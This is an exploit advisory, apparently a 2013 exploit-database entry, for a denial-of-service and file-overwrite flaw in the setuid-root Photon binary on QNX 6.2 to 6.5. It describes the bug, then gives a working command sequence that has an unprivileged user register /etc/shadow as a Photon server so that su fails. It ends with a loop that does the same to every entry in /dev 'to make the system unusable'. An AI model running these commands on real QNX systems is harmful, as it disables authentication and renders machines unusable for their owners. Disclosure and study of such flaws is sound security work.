QNX 6.x Photon Denial Of Service / File Overwrite

`#  
# QNX 6.x Photon denial of service vulnerability by cenobyte 2013  
# <[email protected]>  
#  
# - vulnerability description:  
# QNX setuid root /usr/photon/bin/Photon allows users to create new servers with  
# arbitrary filenames registered with the -N parameter.  
# Photon does not check whether files exist and/or the owner of the ile is the  
# same as the user. Thus any user can create a new server with a filename such  
# as /etc/shadow resulting in a denial of service attack.  
#  
# - vulnerable platforms:  
# QNX 6.5.0SP1  
# QNX 6.5.0  
# QNX 6.4.1  
# QNX 6.3.0  
# QNX 6.2.0  
  
$ id  
uid=100(user) gid=100  
$ /usr/photon/bin/Photon -N /etc/shadow  
$ su -  
su error: Password and Shadow files on different devices  
$ ps -edaf | grep Photon  
100 4524851 4520182 - Oct26 ? 00:00:00 /usr/photon/bin/Photon -N /etc/shadow  
$ kill -9 4524851  
$ su -  
password:  
Sat Oct 26 13:22:38 2013 on /dev/ttyp1  
Last login: Sat Oct 26 02:43:08 2013 on /dev/ttyp1  
edit the file .profile if you want to change your environment.  
To start the Photon windowing environment, type "ph".  
  
# If you want to make the system unusable:  
$ for x in $(ls /dev); do /usr/photon/bin/Photon -N "/dev/$x"; done  
`